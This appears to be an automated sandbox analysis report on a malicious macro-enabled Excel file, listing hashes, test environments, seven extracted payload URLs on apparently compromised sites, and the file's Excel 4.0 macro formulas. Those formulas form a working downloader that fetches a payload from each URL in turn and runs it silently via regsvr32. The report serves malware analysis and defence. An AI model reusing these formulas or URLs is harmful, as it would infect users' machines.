Behavioral task
behavioral1
Sample
43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900.xlsm
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900.xlsm
Resource
win10v2004-20241007-en
General
-
Target
43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900
-
Size
38KB
-
MD5
14a5b683d63be536a46f49b448767eff
-
SHA1
ca835d420edffbad031e671b9674f544671a8da8
-
SHA256
43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900
-
SHA512
a740840a6d55765782872e297bfb7d2fa21c4d5725309139b470135d1e81fa5b33145029c12bfb5016e299eb1022239e606ed35b4780102ebfbb3e2735e70e65
-
SSDEEP
768:WhACdvR8DjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyI:D65YOZZ1ZYpoQ/pMAeVIybs/
Malware Config
Extracted
https://www.rivabodrumresort.com/eski_site/cM2jewS/
https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/
https://localart.net/wp-content/uploads/5rH1dzF11HBD/
https://globaltextiles.net/cgi-bin/M2Gi8MLnY/
https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/
https://sarc.in/wp-admin/ktPHMSvi/
https://www.iinil.com/phpmyadmin/bMnR/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rivabodrumresort.com/eski_site/cM2jewS/","..\roil.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/","..\roil.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://localart.net/wp-content/uploads/5rH1dzF11HBD/","..\roil.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/M2Gi8MLnY/","..\roil.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/","..\roil.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sarc.in/wp-admin/ktPHMSvi/","..\roil.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.iinil.com/phpmyadmin/bMnR/","..\roil.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx") =RETURN()
Signatures
Files
-
43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900.xlsm office2007